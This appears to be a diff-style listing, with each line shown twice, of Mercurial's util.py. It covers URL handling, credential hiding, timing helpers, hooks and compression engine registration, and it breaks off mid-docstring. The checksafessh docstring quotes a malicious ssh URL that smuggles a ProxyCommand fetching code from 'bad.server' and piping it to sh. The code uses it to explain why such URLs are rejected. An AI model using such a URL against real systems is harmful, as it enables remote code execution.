2909 s += self.host
2909 s += self.host
2910 if self.port:
2910 if self.port:
2911 s += ':' + urlreq.quote(self.port)
2911 s += ':' + urlreq.quote(self.port)
2912 if self.host:
2912 if self.host:
2913 s += '/'
2913 s += '/'
2914 if self.path:
2914 if self.path:
2915 # TODO: similar to the query string, we should not unescape the
2915 # TODO: similar to the query string, we should not unescape the
2916 # path when we store it, the path might contain '%2f' = '/',
2916 # path when we store it, the path might contain '%2f' = '/',
2917 # which we should *not* escape.
2917 # which we should *not* escape.
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 if self.query:
2919 if self.query:
2920 # we store the query in escaped form.
2920 # we store the query in escaped form.
2921 s += '?' + self.query
2921 s += '?' + self.query
2922 if self.fragment is not None:
2922 if self.fragment is not None:
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 return s
2924 return s
2925
2925
2926 __str__ = encoding.strmethod(__bytes__)
2926 __str__ = encoding.strmethod(__bytes__)
2927
2927
2928 def authinfo(self):
2928 def authinfo(self):
2929 user, passwd = self.user, self.passwd
2929 user, passwd = self.user, self.passwd
2930 try:
2930 try:
2931 self.user, self.passwd = None, None
2931 self.user, self.passwd = None, None
2932 s = bytes(self)
2932 s = bytes(self)
2933 finally:
2933 finally:
2934 self.user, self.passwd = user, passwd
2934 self.user, self.passwd = user, passwd
2935 if not self.user:
2935 if not self.user:
2936 return (s, None)
2936 return (s, None)
2937 # authinfo[1] is passed to urllib2 password manager, and its
2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 # URIs must not contain credentials. The host is passed in the
2938 # URIs must not contain credentials. The host is passed in the
2939 # URIs list because Python < 2.4.3 uses only that to search for
2939 # URIs list because Python < 2.4.3 uses only that to search for
2940 # a password.
2940 # a password.
2941 return (s, (None, (s, self.host),
2941 return (s, (None, (s, self.host),
2942 self.user, self.passwd or ''))
2942 self.user, self.passwd or ''))
2943
2943
2944 def isabs(self):
2944 def isabs(self):
2945 if self.scheme and self.scheme != 'file':
2945 if self.scheme and self.scheme != 'file':
2946 return True # remote URL
2946 return True # remote URL
2947 if hasdriveletter(self.path):
2947 if hasdriveletter(self.path):
2948 return True # absolute for our purposes - can't be joined()
2948 return True # absolute for our purposes - can't be joined()
2949 if self.path.startswith(br'\\'):
2949 if self.path.startswith(br'\\'):
2950 return True # Windows UNC path
2950 return True # Windows UNC path
2951 if self.path.startswith('/'):
2951 if self.path.startswith('/'):
2952 return True # POSIX-style
2952 return True # POSIX-style
2953 return False
2953 return False
2954
2954
2955 def localpath(self):
2955 def localpath(self):
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 path = self.path or '/'
2957 path = self.path or '/'
2958 # For Windows, we need to promote hosts containing drive
2958 # For Windows, we need to promote hosts containing drive
2959 # letters to paths with drive letters.
2959 # letters to paths with drive letters.
2960 if hasdriveletter(self._hostport):
2960 if hasdriveletter(self._hostport):
2961 path = self._hostport + '/' + self.path
2961 path = self._hostport + '/' + self.path
2962 elif (self.host is not None and self.path
2962 elif (self.host is not None and self.path
2963 and not hasdriveletter(path)):
2963 and not hasdriveletter(path)):
2964 path = '/' + path
2964 path = '/' + path
2965 return path
2965 return path
2966 return self._origpath
2966 return self._origpath
2967
2967
2968 def islocal(self):
2968 def islocal(self):
2969 '''whether localpath will return something that posixfile can open'''
2969 '''whether localpath will return something that posixfile can open'''
2970 return (not self.scheme or self.scheme == 'file'
2970 return (not self.scheme or self.scheme == 'file'
2971 or self.scheme == 'bundle')
2971 or self.scheme == 'bundle')
2972
2972
2973 def hasscheme(path):
2973 def hasscheme(path):
2974 return bool(url(path).scheme)
2974 return bool(url(path).scheme)
2975
2975
2976 def hasdriveletter(path):
2976 def hasdriveletter(path):
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978
2978
2979 def urllocalpath(path):
2979 def urllocalpath(path):
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981
2981
2982 def checksafessh(path):
2982 def checksafessh(path):
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984
2984
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 Let's prevent these potentially exploited urls entirely and warn the
2987 Let's prevent these potentially exploited urls entirely and warn the
2988 user.
2988 user.
2989
2989
2990 Raises an error.Abort when the url is unsafe.
2990 Raises an error.Abort when the url is unsafe.
2991 """
2991 """
2992 path = urlreq.unquote(path)
2992 path = urlreq.unquote(path)
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 raise error.Abort(_('potentially unsafe url: %r') %
2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 (pycompat.bytestr(path),))
2995 (pycompat.bytestr(path),))
2996
2996
2997 def hidepassword(u):
2997 def hidepassword(u):
2998 '''hide user credential in a url string'''
2998 '''hide user credential in a url string'''
2999 u = url(u)
2999 u = url(u)
3000 if u.passwd:
3000 if u.passwd:
3001 u.passwd = '***'
3001 u.passwd = '***'
3002 return bytes(u)
3002 return bytes(u)
3003
3003
3004 def removeauth(u):
3004 def removeauth(u):
3005 '''remove all authentication information from a url string'''
3005 '''remove all authentication information from a url string'''
3006 u = url(u)
3006 u = url(u)
3007 u.user = u.passwd = None
3007 u.user = u.passwd = None
3008 return bytes(u)
3008 return bytes(u)
3009
3009
3010 timecount = unitcountfn(
3010 timecount = unitcountfn(
3011 (1, 1e3, _('%.0f s')),
3011 (1, 1e3, _('%.0f s')),
3012 (100, 1, _('%.1f s')),
3012 (100, 1, _('%.1f s')),
3013 (10, 1, _('%.2f s')),
3013 (10, 1, _('%.2f s')),
3014 (1, 1, _('%.3f s')),
3014 (1, 1, _('%.3f s')),
3015 (100, 0.001, _('%.1f ms')),
3015 (100, 0.001, _('%.1f ms')),
3016 (10, 0.001, _('%.2f ms')),
3016 (10, 0.001, _('%.2f ms')),
3017 (1, 0.001, _('%.3f ms')),
3017 (1, 0.001, _('%.3f ms')),
3018 (100, 0.000001, _('%.1f us')),
3018 (100, 0.000001, _('%.1f us')),
3019 (10, 0.000001, _('%.2f us')),
3019 (10, 0.000001, _('%.2f us')),
3020 (1, 0.000001, _('%.3f us')),
3020 (1, 0.000001, _('%.3f us')),
3021 (100, 0.000000001, _('%.1f ns')),
3021 (100, 0.000000001, _('%.1f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3024 )
3024 )
3025
3025
3026 @attr.s
3026 @attr.s
3027 class timedcmstats(object):
3027 class timedcmstats(object):
3028 """Stats information produced by the timedcm context manager on entering."""
3028 """Stats information produced by the timedcm context manager on entering."""
3029
3029
3030 # the starting value of the timer as a float (meaning and resulution is
3030 # the starting value of the timer as a float (meaning and resulution is
3031 # platform dependent, see util.timer)
3031 # platform dependent, see util.timer)
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 # the number of seconds as a floating point value; starts at 0, updated when
3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 # the context is exited.
3034 # the context is exited.
3035 elapsed = attr.ib(default=0)
3035 elapsed = attr.ib(default=0)
3036 # the number of nested timedcm context managers.
3036 # the number of nested timedcm context managers.
3037 level = attr.ib(default=1)
3037 level = attr.ib(default=1)
3038
3038
3039 def __bytes__(self):
3039 def __bytes__(self):
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041
3041
3042 __str__ = encoding.strmethod(__bytes__)
3042 __str__ = encoding.strmethod(__bytes__)
3043
3043
3044 @contextlib.contextmanager
3044 @contextlib.contextmanager
3045 def timedcm(whencefmt, *whenceargs):
3045 def timedcm(whencefmt, *whenceargs):
3046 """A context manager that produces timing information for a given context.
3046 """A context manager that produces timing information for a given context.
3047
3047
3048 On entering a timedcmstats instance is produced.
3048 On entering a timedcmstats instance is produced.
3049
3049
3050 This context manager is reentrant.
3050 This context manager is reentrant.
3051
3051
3052 """
3052 """
3053 # track nested context managers
3053 # track nested context managers
3054 timedcm._nested += 1
3054 timedcm._nested += 1
3055 timing_stats = timedcmstats(level=timedcm._nested)
3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 try:
3056 try:
3057 with tracing.log(whencefmt, *whenceargs):
3057 with tracing.log(whencefmt, *whenceargs):
3058 yield timing_stats
3058 yield timing_stats
3059 finally:
3059 finally:
3060 timing_stats.elapsed = timer() - timing_stats.start
3060 timing_stats.elapsed = timer() - timing_stats.start
3061 timedcm._nested -= 1
3061 timedcm._nested -= 1
3062
3062
3063 timedcm._nested = 0
3063 timedcm._nested = 0
3064
3064
3065 def timed(func):
3065 def timed(func):
3066 '''Report the execution time of a function call to stderr.
3066 '''Report the execution time of a function call to stderr.
3067
3067
3068 During development, use as a decorator when you need to measure
3068 During development, use as a decorator when you need to measure
3069 the cost of a function, e.g. as follows:
3069 the cost of a function, e.g. as follows:
3070
3070
3071 @util.timed
3071 @util.timed
3072 def foo(a, b, c):
3072 def foo(a, b, c):
3073 pass
3073 pass
3074 '''
3074 '''
3075
3075
3076 def wrapper(*args, **kwargs):
3076 def wrapper(*args, **kwargs):
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 result = func(*args, **kwargs)
3078 result = func(*args, **kwargs)
3079 stderr = procutil.stderr
3079 stderr = procutil.stderr
3080 stderr.write('%s%s: %s\n' % (
3080 stderr.write('%s%s: %s\n' % (
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 time_stats))
3082 time_stats))
3083 return result
3083 return result
3084 return wrapper
3084 return wrapper
3085
3085
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088
3088
3089 def sizetoint(s):
3089 def sizetoint(s):
3090 '''Convert a space specifier to a byte count.
3090 '''Convert a space specifier to a byte count.
3091
3091
3092 >>> sizetoint(b'30')
3092 >>> sizetoint(b'30')
3093 30
3093 30
3094 >>> sizetoint(b'2.2kb')
3094 >>> sizetoint(b'2.2kb')
3095 2252
3095 2252
3096 >>> sizetoint(b'6M')
3096 >>> sizetoint(b'6M')
3097 6291456
3097 6291456
3098 '''
3098 '''
3099 t = s.strip().lower()
3099 t = s.strip().lower()
3100 try:
3100 try:
3101 for k, u in _sizeunits:
3101 for k, u in _sizeunits:
3102 if t.endswith(k):
3102 if t.endswith(k):
3103 return int(float(t[:-len(k)]) * u)
3103 return int(float(t[:-len(k)]) * u)
3104 return int(t)
3104 return int(t)
3105 except ValueError:
3105 except ValueError:
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107
3107
3108 class hooks(object):
3108 class hooks(object):
3109 '''A collection of hook functions that can be used to extend a
3109 '''A collection of hook functions that can be used to extend a
3110 function's behavior. Hooks are called in lexicographic order,
3110 function's behavior. Hooks are called in lexicographic order,
3111 based on the names of their sources.'''
3111 based on the names of their sources.'''
3112
3112
3113 def __init__(self):
3113 def __init__(self):
3114 self._hooks = []
3114 self._hooks = []
3115
3115
3116 def add(self, source, hook):
3116 def add(self, source, hook):
3117 self._hooks.append((source, hook))
3117 self._hooks.append((source, hook))
3118
3118
3119 def __call__(self, *args):
3119 def __call__(self, *args):
3120 self._hooks.sort(key=lambda x: x[0])
3120 self._hooks.sort(key=lambda x: x[0])
3121 results = []
3121 results = []
3122 for source, hook in self._hooks:
3122 for source, hook in self._hooks:
3123 results.append(hook(*args))
3123 results.append(hook(*args))
3124 return results
3124 return results
3125
3125
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 '''Yields lines for a nicely formatted stacktrace.
3127 '''Yields lines for a nicely formatted stacktrace.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3129 Each file+linenumber is formatted according to fileline.
3129 Each file+linenumber is formatted according to fileline.
3130 Each line is formatted according to line.
3130 Each line is formatted according to line.
3131 If line is None, it yields:
3131 If line is None, it yields:
3132 length of longest filepath+line number,
3132 length of longest filepath+line number,
3133 filepath+linenumber,
3133 filepath+linenumber,
3134 function
3134 function
3135
3135
3136 Not be used in production code but very convenient while developing.
3136 Not be used in production code but very convenient while developing.
3137 '''
3137 '''
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 ][-depth:]
3140 ][-depth:]
3141 if entries:
3141 if entries:
3142 fnmax = max(len(entry[0]) for entry in entries)
3142 fnmax = max(len(entry[0]) for entry in entries)
3143 for fnln, func in entries:
3143 for fnln, func in entries:
3144 if line is None:
3144 if line is None:
3145 yield (fnmax, fnln, func)
3145 yield (fnmax, fnln, func)
3146 else:
3146 else:
3147 yield line % (fnmax, fnln, func)
3147 yield line % (fnmax, fnln, func)
3148
3148
3149 def debugstacktrace(msg='stacktrace', skip=0,
3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3153 By default it will flush stdout first.
3153 By default it will flush stdout first.
3154 It can be used everywhere and intentionally does not require an ui object.
3154 It can be used everywhere and intentionally does not require an ui object.
3155 Not be used in production code but very convenient while developing.
3155 Not be used in production code but very convenient while developing.
3156 '''
3156 '''
3157 if otherf:
3157 if otherf:
3158 otherf.flush()
3158 otherf.flush()
3159 f.write('%s at:\n' % msg.rstrip())
3159 f.write('%s at:\n' % msg.rstrip())
3160 for line in getstackframes(skip + 1, depth=depth):
3160 for line in getstackframes(skip + 1, depth=depth):
3161 f.write(line)
3161 f.write(line)
3162 f.flush()
3162 f.flush()
3163
3163
3164 class dirs(object):
3164 class dirs(object):
3165 '''a multiset of directory names from a dirstate or manifest'''
3165 '''a multiset of directory names from a dirstate or manifest'''
3166
3166
3167 def __init__(self, map, skip=None):
3167 def __init__(self, map, skip=None):
3168 self._dirs = {}
3168 self._dirs = {}
3169 addpath = self.addpath
3169 addpath = self.addpath
3170 if safehasattr(map, 'iteritems') and skip is not None:
3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 for f, s in map.iteritems():
3171 for f, s in map.iteritems():
3172 if s[0] != skip:
3172 if s[0] != skip:
3173 addpath(f)
3173 addpath(f)
3174 else:
3174 else:
3175 for f in map:
3175 for f in map:
3176 addpath(f)
3176 addpath(f)
3177
3177
3178 def addpath(self, path):
3178 def addpath(self, path):
3179 dirs = self._dirs
3179 dirs = self._dirs
3180 for base in finddirs(path):
3180 for base in finddirs(path):
3181 if base in dirs:
3181 if base in dirs:
3182 dirs[base] += 1
3182 dirs[base] += 1
3183 return
3183 return
3184 dirs[base] = 1
3184 dirs[base] = 1
3185
3185
3186 def delpath(self, path):
3186 def delpath(self, path):
3187 dirs = self._dirs
3187 dirs = self._dirs
3188 for base in finddirs(path):
3188 for base in finddirs(path):
3189 if dirs[base] > 1:
3189 if dirs[base] > 1:
3190 dirs[base] -= 1
3190 dirs[base] -= 1
3191 return
3191 return
3192 del dirs[base]
3192 del dirs[base]
3193
3193
3194 def __iter__(self):
3194 def __iter__(self):
3195 return iter(self._dirs)
3195 return iter(self._dirs)
3196
3196
3197 def __contains__(self, d):
3197 def __contains__(self, d):
3198 return d in self._dirs
3198 return d in self._dirs
3199
3199
3200 if safehasattr(parsers, 'dirs'):
3200 if safehasattr(parsers, 'dirs'):
3201 dirs = parsers.dirs
3201 dirs = parsers.dirs
3202
3202
3203 def finddirs(path):
3203 def finddirs(path):
3204 pos = path.rfind('/')
3204 pos = path.rfind('/')
3205 while pos != -1:
3205 while pos != -1:
3206 yield path[:pos]
3206 yield path[:pos]
3207 pos = path.rfind('/', 0, pos)
3207 pos = path.rfind('/', 0, pos)
3208
3208
3209 # compression code
3209 # compression code
3210
3210
3211 SERVERROLE = 'server'
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3212 CLIENTROLE = 'client'
3213
3213
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3215 (u'name', u'serverpriority',
3215 (u'name', u'serverpriority',
3216 u'clientpriority'))
3216 u'clientpriority'))
3217
3217
3218 class compressormanager(object):
3218 class compressormanager(object):
3219 """Holds registrations of various compression engines.
3219 """Holds registrations of various compression engines.
3220
3220
3221 This class essentially abstracts the differences between compression
3221 This class essentially abstracts the differences between compression
3222 engines to allow new compression formats to be added easily, possibly from
3222 engines to allow new compression formats to be added easily, possibly from
3223 extensions.
3223 extensions.
3224
3224
3225 Compressors are registered against the global instance by calling its
3225 Compressors are registered against the global instance by calling its
3226 ``register()`` method.
3226 ``register()`` method.
3227 """
3227 """
3228 def __init__(self):
3228 def __init__(self):
3229 self._engines = {}
3229 self._engines = {}
3230 # Bundle spec human name to engine name.
3230 # Bundle spec human name to engine name.
3231 self._bundlenames = {}
3231 self._bundlenames = {}
3232 # Internal bundle identifier to engine name.
3232 # Internal bundle identifier to engine name.
3233 self._bundletypes = {}
3233 self._bundletypes = {}
3234 # Revlog header to engine name.
3234 # Revlog header to engine name.
3235 self._revlogheaders = {}
3235 self._revlogheaders = {}
3236 # Wire proto identifier to engine name.
3236 # Wire proto identifier to engine name.
3237 self._wiretypes = {}
3237 self._wiretypes = {}
3238
3238
3239 def __getitem__(self, key):
3239 def __getitem__(self, key):
3240 return self._engines[key]
3240 return self._engines[key]
3241
3241
3242 def __contains__(self, key):
3242 def __contains__(self, key):
3243 return key in self._engines
3243 return key in self._engines
3244
3244
3245 def __iter__(self):
3245 def __iter__(self):
3246 return iter(self._engines.keys())
3246 return iter(self._engines.keys())
3247
3247
3248 def register(self, engine):
3248 def register(self, engine):
3249 """Register a compression engine with the manager.
3249 """Register a compression engine with the manager.
3250
3250
3251 The argument must be a ``compressionengine`` instance.
3251 The argument must be a ``compressionengine`` instance.
3252 """
3252 """
3253 if not isinstance(engine, compressionengine):
3253 if not isinstance(engine, compressionengine):
3254 raise ValueError(_('argument must be a compressionengine'))
3254 raise ValueError(_('argument must be a compressionengine'))
3255
3255
3256 name = engine.name()
3256 name = engine.name()
3257
3257
3258 if name in self._engines:
3258 if name in self._engines:
3259 raise error.Abort(_('compression engine %s already registered') %
3259 raise error.Abort(_('compression engine %s already registered') %
3260 name)
3260 name)
3261
3261
3262 bundleinfo = engine.bundletype()
3262 bundleinfo = engine.bundletype()
3263 if bundleinfo:
3263 if bundleinfo:
3264 bundlename, bundletype = bundleinfo
3264 bundlename, bundletype = bundleinfo
3265
3265
3266 if bundlename in self._bundlenames:
3266 if bundlename in self._bundlenames:
3267 raise error.Abort(_('bundle name %s already registered') %
3267 raise error.Abort(_('bundle name %s already registered') %
3268 bundlename)
3268 bundlename)
3269 if bundletype in self._bundletypes:
3269 if bundletype in self._bundletypes:
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 (bundletype, self._bundletypes[bundletype]))
3271 (bundletype, self._bundletypes[bundletype]))
3272
3272
3273 # No external facing name declared.
3273 # No external facing name declared.
3274 if bundlename:
3274 if bundlename:
3275 self._bundlenames[bundlename] = name
3275 self._bundlenames[bundlename] = name
3276
3276
3277 self._bundletypes[bundletype] = name
3277 self._bundletypes[bundletype] = name
3278
3278
3279 wiresupport = engine.wireprotosupport()
3279 wiresupport = engine.wireprotosupport()
3280 if wiresupport:
3280 if wiresupport:
3281 wiretype = wiresupport.name
3281 wiretype = wiresupport.name
3282 if wiretype in self._wiretypes:
3282 if wiretype in self._wiretypes:
3283 raise error.Abort(_('wire protocol compression %s already '
3283 raise error.Abort(_('wire protocol compression %s already '
3284 'registered by %s') %
3284 'registered by %s') %
3285 (wiretype, self._wiretypes[wiretype]))
3285 (wiretype, self._wiretypes[wiretype]))
3286
3286
3287 self._wiretypes[wiretype] = name
3287 self._wiretypes[wiretype] = name
3288
3288
3289 revlogheader = engine.revlogheader()
3289 revlogheader = engine.revlogheader()
3290 if revlogheader and revlogheader in self._revlogheaders:
3290 if revlogheader and revlogheader in self._revlogheaders:
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 (revlogheader, self._revlogheaders[revlogheader]))
3292 (revlogheader, self._revlogheaders[revlogheader]))
3293
3293
3294 if revlogheader:
3294 if revlogheader:
3295 self._revlogheaders[revlogheader] = name
3295 self._revlogheaders[revlogheader] = name
3296
3296
3297 self._engines[name] = engine
3297 self._engines[name] = engine
3298
3298
3299 @property
3299 @property
3300 def supportedbundlenames(self):
3300 def supportedbundlenames(self):
3301 return set(self._bundlenames.keys())
3301 return set(self._bundlenames.keys())
3302
3302
3303 @property
3303 @property
3304 def supportedbundletypes(self):
3304 def supportedbundletypes(self):
3305 return set(self._bundletypes.keys())
3305 return set(self._bundletypes.keys())
3306
3306
3307 def forbundlename(self, bundlename):
3307 def forbundlename(self, bundlename):
3308 """Obtain a compression engine registered to a bundle name.
3308 """Obtain a compression engine registered to a bundle name.
3309
3309
3310 Will raise KeyError if the bundle type isn't registered.
3310 Will raise KeyError if the bundle type isn't registered.
3311
3311
3312 Will abort if the engine is known but not available.
3312 Will abort if the engine is known but not available.
3313 """
3313 """
3314 engine = self._engines[self._bundlenames[bundlename]]
3314 engine = self._engines[self._bundlenames[bundlename]]
3315 if not engine.available():
3315 if not engine.available():
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 engine.name())
3317 engine.name())
3318 return engine
3318 return engine
3319
3319
3320 def forbundletype(self, bundletype):
3320 def forbundletype(self, bundletype):
3321 """Obtain a compression engine registered to a bundle type.
3321 """Obtain a compression engine registered to a bundle type.
3322
3322
3323 Will raise KeyError if the bundle type isn't registered.
3323 Will raise KeyError if the bundle type isn't registered.
3324
3324
3325 Will abort if the engine is known but not available.
3325 Will abort if the engine is known but not available.
3326 """
3326 """
3327 engine = self._engines[self._bundletypes[bundletype]]
3327 engine = self._engines[self._bundletypes[bundletype]]
3328 if not engine.available():
3328 if not engine.available():
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 engine.name())
3330 engine.name())
3331 return engine
3331 return engine
3332
3332
3333 def supportedwireengines(self, role, onlyavailable=True):
3333 def supportedwireengines(self, role, onlyavailable=True):
3334 """Obtain compression engines that support the wire protocol.
3334 """Obtain compression engines that support the wire protocol.
3335
3335
3336 Returns a list of engines in prioritized order, most desired first.
3336 Returns a list of engines in prioritized order, most desired first.
3337
3337
3338 If ``onlyavailable`` is set, filter out engines that can't be
3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 loaded.
3339 loaded.
3340 """
3340 """
3341 assert role in (SERVERROLE, CLIENTROLE)
3341 assert role in (SERVERROLE, CLIENTROLE)
3342
3342
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344
3344
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 if onlyavailable:
3346 if onlyavailable:
3347 engines = [e for e in engines if e.available()]
3347 engines = [e for e in engines if e.available()]
3348
3348
3349 def getkey(e):
3349 def getkey(e):
3350 # Sort first by priority, highest first. In case of tie, sort
3350 # Sort first by priority, highest first. In case of tie, sort
3351 # alphabetically. This is arbitrary, but ensures output is
3351 # alphabetically. This is arbitrary, but ensures output is
3352 # stable.
3352 # stable.
3353 w = e.wireprotosupport()
3353 w = e.wireprotosupport()
3354 return -1 * getattr(w, attr), w.name
3354 return -1 * getattr(w, attr), w.name
3355
3355
3356 return list(sorted(engines, key=getkey))
3356 return list(sorted(engines, key=getkey))
3357
3357
3358 def forwiretype(self, wiretype):
3358 def forwiretype(self, wiretype):
3359 engine = self._engines[self._wiretypes[wiretype]]
3359 engine = self._engines[self._wiretypes[wiretype]]
3360 if not engine.available():
3360 if not engine.available():
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 engine.name())
3362 engine.name())
3363 return engine
3363 return engine
3364
3364
3365 def forrevlogheader(self, header):
3365 def forrevlogheader(self, header):
3366 """Obtain a compression engine registered to a revlog header.
3366 """Obtain a compression engine registered to a revlog header.
3367
3367
3368 Will raise KeyError if the revlog header value isn't registered.
3368 Will raise KeyError if the revlog header value isn't registered.
3369 """
3369 """
3370 return self._engines[self._revlogheaders[header]]
3370 return self._engines[self._revlogheaders[header]]
3371
3371
3372 compengines = compressormanager()
3372 compengines = compressormanager()
3373
3373
3374 class compressionengine(object):
3374 class compressionengine(object):
3375 """Base class for compression engines.
3375 """Base class for compression engines.
3376
3376
3377 Compression engines must implement the interface defined by this class.
3377 Compression engines must implement the interface defined by this class.
3378 """
3378 """
3379 def name(self):
3379 def name(self):
3380 """Returns the name of the compression engine.
3380 """Returns the name of the compression engine.
3381
3381
3382 This is the key the engine is registered under.
3382 This is the key the engine is registered under.
3383
3383
3384 This method must be implemented.
3384 This method must be implemented.
3385 """
3385 """
3386 raise NotImplementedError()
3386 raise NotImplementedError()
3387
3387
3388 def available(self):
3388 def available(self):
3389 """Whether the compression engine is available.
3389 """Whether the compression engine is available.
3390
3390
3391 The intent of this method is to allow optional compression engines
3391 The intent of this method is to allow optional compression engines
3392 that may not be available in all installations (such as engines relying
3392 that may not be available in all installations (such as engines relying
3393 on C extensions that may not be present).
3393 on C extensions that may not be present).
3394 """
3394 """
3395 return True
3395 return True
3396
3396
3397 def bundletype(self):
3397 def bundletype(self):
3398 """Describes bundle identifiers for this engine.
3398 """Describes bundle identifiers for this engine.
3399
3399
3400 If this compression engine isn't supported for bundles, returns None.
3400 If this compression engine isn't supported for bundles, returns None.
3401
3401
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 the user-facing "bundle spec" compression name and an internal
3403 the user-facing "bundle spec" compression name and an internal
3404 identifier used to denote the compression format within bundles. To
3404 identifier used to denote the compression format within bundles. To
3405 exclude the name from external usage, set the first element to ``None``.
3405 exclude the name from external usage, set the first element to ``None``.
3406
3406
3407 If bundle compression is supported, the class must also implement
3407 If bundle compression is supported, the class must also implement
3408 ``compressstream`` and `decompressorreader``.
3408 ``compressstream`` and `decompressorreader``.
3409
3409
3410 The docstring of this method is used in the help system to tell users
3410 The docstring of this method is used in the help system to tell users
3411 about this engine.
3411 about this engine.
3412 """
3412 """
3413 return None
3413 return None
3414
3414
3415 def wireprotosupport(self):
3415 def wireprotosupport(self):
3416 """Declare support for this compression format on the wire protocol.
3416 """Declare support for this compression format on the wire protocol.
3417
3417
3418 If this compression engine isn't supported for compressing wire
3418 If this compression engine isn't supported for compressing wire
3419 protocol payloads, returns None.
3419 protocol payloads, returns None.
3420
3420
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 fields:
3422 fields:
3423
3423
3424 * String format identifier
3424 * String format identifier
3425 * Integer priority for the server
3425 * Integer priority for the server
3426 * Integer priority for the client
3426 * Integer priority for the client
3427
3427
3428 The integer priorities are used to order the advertisement of format
3428 The integer priorities are used to order the advertisement of format
3429 support by server and client. The highest integer is advertised
3429 support by server and client. The highest integer is advertised
3430 first. Integers with non-positive values aren't advertised.
3430 first. Integers with non-positive values aren't advertised.
3431
3431
3432 The priority values are somewhat arbitrary and only used for default
3432 The priority values are somewhat arbitrary and only used for default
3433 ordering. The relative order can be changed via config options.
3433 ordering. The relative order can be changed via config options.
3434
3434
3435 If wire protocol compression is supported, the class must also implement
3435 If wire protocol compression is supported, the class must also implement
3436 ``compressstream`` and ``decompressorreader``.
3436 ``compressstream`` and ``decompressorreader``.
3437 """
3437 """
3438 return None
3438 return None
3439
3439
3440 def revlogheader(self):
3440 def revlogheader(self):
3441 """Header added to revlog chunks that identifies this engine.
3441 """Header added to revlog chunks that identifies this engine.
3442
3442
3443 If this engine can be used to compress revlogs, this method should
3443 If this engine can be used to compress revlogs, this method should
3444 return the bytes used to identify chunks compressed with this engine.
